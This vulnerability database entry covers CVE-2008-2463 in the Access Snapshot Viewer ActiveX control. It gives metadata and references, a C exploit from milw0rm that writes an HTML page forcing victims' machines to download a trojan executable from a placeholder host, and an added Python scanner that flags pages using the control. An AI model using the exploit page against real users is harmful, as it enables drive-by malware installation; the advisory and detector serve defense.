Microsoft Access Snapshot Viewer ActiveX Control Arbitrary File Download Vulnerability

Vulnerability ID: 1115754
Vulnerability type: Code injection
Published: 2008-07-24
Updated: 2008-10-15
CVE ID: CVE-2008-2463
CNNVD-ID: CNNVD-200807-096
Platform: Windows
CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/6124
https://www.securityfocus.com/bid/30114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-096
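|Vulnerability details
Microsoft Access is the relational database management system in the Office suite from Microsoft (USA). Access bundles the Snapshot Viewer ActiveX control, which makes it easy to view Access report snapshots. The control does not properly validate certain input parameters. If a user is tricked into visiting a malicious site, files from that site can be downloaded to an arbitrary location on the user's machine. This vulnerability is currently being actively exploited.
|Exploit (EXP)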
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() */


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attack'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
              "var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
              "attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        /* Open the output HTML file for writing. */
        if ( (File = fopen(Filename,"w")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        fwrite(data, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}

// milw0rm.com [2008-07-24]
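
A defender-side check for pages that instantiate this control, added here as an example (it is not part of the original advisory or of the exploit author's code): it flags `<object>` tags carrying the CLSID from the listing above and records whether the page touches `SnapshotPath`, `CompressedPath` or `PrintSnapshot`, from script or from `<param>` tags. The function name, severity labels and sample pages are assumptions made for this example.

```python
import re

# CLSID of the Snapshot Viewer control, copied from the exploit listing on this page.
SNAPVIEW_CLSID = "F0E42D50-368C-11D0-AD81-00A0C90DC8D9"
# Members the listing sets or calls; COM dispatch names are matched case-insensitively.
MEMBERS = {m.lower(): m for m in ("SnapshotPath", "CompressedPath", "PrintSnapshot")}

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
CLASSID = re.compile(r"classid\s*=\s*['\"]?\s*clsid:\s*\{?([0-9a-f-]{36})\}?", re.I)
ELEM_ID = re.compile(r"\bid\s*=\s*['\"]?([\w$-]+)", re.I)
# Member reached from script (obj.Member) or set declaratively (<param name=Member>).
MEMBER_USE = re.compile(
    r"(?:\.\s*|<param\b[^>]*\bname\s*=\s*['\"]?)(%s)\b" % "|".join(MEMBERS), re.I)


def scan_html(html):
    """Return one finding per <object> tag that instantiates the control."""
    used = sorted({MEMBERS[m.group(1).lower()] for m in MEMBER_USE.finditer(html)})
    findings = []
    for tag in OBJECT_TAG.finditer(html):
        clsid = CLASSID.search(tag.group(0))
        if not clsid or clsid.group(1).upper() != SNAPVIEW_CLSID:
            continue
        elem_id = ELEM_ID.search(tag.group(0))
        findings.append({
            "offset": tag.start(),
            "id": elem_id.group(1) if elem_id else None,
            "members": used,
            # Instantiation alone is suspicious; driving the path members is worse.
            "severity": "high" if used else "medium",
        })
    return findings


# Constructed sample pages (placeholder URL and path, not real indicators).
SCRIPTED = """<html><object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='v'></object>
<script>v.SnapshotPath = 'http://example.invalid/a.snp';
v.CompressedPath = 'C:/placeholder/out.bin'; v.PrintSnapshot();</script></html>"""
BARE = '<OBJECT ID="x" CLASSID="CLSID:{f0e42d50-368c-11d0-ad81-00a0c90dc8d9}"></OBJECT>'
OTHER = "<object classid='clsid:00000000-0000-0000-0000-000000000000'></object>"

if __name__ == "__main__":
    for name, page in (("scripted", SCRIPTED), ("bare", BARE), ("other", OTHER)):
        print(name, scan_html(page))
```

The same matching can run over proxy-cached responses or mail attachments; a "medium" hit still deserves review because ordinary web pages have little reason to load this control.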
|Affected products
Microsoft Snapshot Viewer for Microsoft Access 0 Microsoft Access 2003 SP3 + Microsoft Office XP SP2 + Microsoft Office XP SP2
|References

Source: US-CERT
Name: TA08-225A
Link: http://www.us-cert.gov/cas/techalerts/TA08-225A.html
Source: US-CERT
Name: TA08-189A
Link: http://www.us-cert.gov/cas/techalerts/TA08-189A.html
Source: US-CERT
Name: VU#837785
Link: http://www.kb.cert.org/vuls/id/837785
Source: XF
Name: microsoft-snapshotviewer-code-execution(43613)
Link: http://xforce.iss.net/xforce/xfdb/43613
Source: SECTRACK
Name: 1020433
Link: http://www.securitytracker.com/id?1020433
Source: BID
Name: 30114
Link: http://www.securityfocus.com/bid/30114
Source: www.microsoft.com
Link: http://www.microsoft.com/technet/security/advisory/955179.mspx
Source: VUPEN
Name: ADV-2008-2012
Link: http://www.frsirt.com/english/advisories/2008/2012/references
Source: SECUNIA
Name: 30883
Link: http://secunia.com/advisories/30883
Source: OVAL
Name: oval:org.mitre.oval:def:6120
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6120
Source: HP
Name: HPSBST02360
Link: http://marc.info/?l=bugtraq&m=121915960406986&w=2